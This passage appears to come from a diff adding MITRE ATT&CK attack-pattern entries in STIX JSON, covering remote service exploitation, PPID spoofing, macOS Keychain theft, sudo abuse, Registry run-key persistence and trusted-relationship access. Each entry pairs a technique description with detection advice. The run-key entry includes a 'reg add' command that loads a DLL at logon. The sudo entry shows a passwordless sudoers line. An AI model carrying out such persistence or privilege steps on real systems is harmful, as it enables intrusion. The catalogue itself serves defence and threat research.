"DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ExtraHop" + ], + "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1210", + "external_id": "T1210" + }, + { + "source_name": "CIS Multiple SMB Vulnerabilities", + "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", + "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/" + }, + { + "source_name": "NVD CVE-2017-0176", + "description": "National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-0176" + }, + { + "source_name": "NVD CVE-2016-6662", + "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662" + }, + { + "source_name": "NVD CVE-2014-7169", + "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Parent PID Spoofing", + "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Wayne Silva, F-Secure Countercept" + ], + "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Heuristic Detection" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", + "created": "2019-06-03T14:50:50.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1502", + "external_id": "T1502" + }, + { + "source_name": "DidierStevens SelectMyParent Nov 2009", + "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.", + "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/" + }, + { + "source_name": "Microsoft UAC Nov 2018", + "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.", + "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works" + }, + { + "source_name": "CounterCept PPID Spoofing Dec 2018", + "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.", + "url": "https://www.countercept.com/blog/detecting-parent-pid-spoofing/" + }, + { + "source_name": "CTD PPID Spoofing Macro Mar 2019", + "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.", + "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/" + }, + { + "source_name": "XPNSec PPID Nov 2017", + "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.", + "url": "https://blog.xpnsec.com/becoming-system/" + }, + { + "source_name": "Microsoft Process Creation Flags May 2018", + "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.", + "url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags" + }, + { + "source_name": "Secuirtyinbits Ataware3 May 2019", + "description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.", + "url": "https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Keychain", + "description": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1142", + "external_id": "T1142" + }, + { + "source_name": "Wikipedia keychain", + "description": "Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Keychain_(software)" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-16T13:09:39.215Z", + "name": "Internal Spearphishing", + "description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim MalcomVetter", + "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "created": "2019-09-04T19:26:12.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1534", + "external_id": "T1534" + }, + { + "source_name": "Trend Micro When Phishing Starts from the Inside 2017", + "description": "Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.", + "url": "https://blog.trendmicro.com/phishing-starts-inside/" + }, + { + "source_name": "Int SP - chat apps", + "description": "Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/" + }, + { + "source_name": "Trend Micro - Int SP", + "description": "Trend Micro. (n.d.). Retrieved February 16, 2024.", + "url": "https://www.trendmicro.com/en_us/research.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Sudo", + "description": "The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). \n\nAdversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1169", + "external_id": "T1169" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Services File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak" + ], + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM", + "Administrator", + "User" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "created": "2020-03-12T20:43:53.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/010", + "external_id": "T1574.010" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T09:08:22.319Z", + "name": "Registry Run Keys / Startup Folder", + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run automatically for the currently logged-on user.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oddvar Moe, @oddvarmoe", + "Dray Agha, @Purp1eW0lf, Huntress Labs", + "Harun Küßner" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "created": "2020-01-23T22:02:48.566Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/001", + "external_id": "T1547.001" + }, + { + "source_name": "Malwarebytes Wow6432Node 2016", + "description": "Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.", + "url": "https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/" + }, + { + "source_name": "Microsoft Wow6432Node 2018", + "description": "Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry" + }, + { + "source_name": "Microsoft Run Key", + "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa376977" + }, + { + "source_name": "Oddvar Moe RunOnceEx Mar 2018", + "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.", + "url": "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:08.425Z", + "name": "Exploitation for Evasion", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0820", + "external_id": "T0820" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Trusted Relationship", + "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian", + "ExtraHop", + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Office 365" + ], + "x_mitre_version": "2.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": 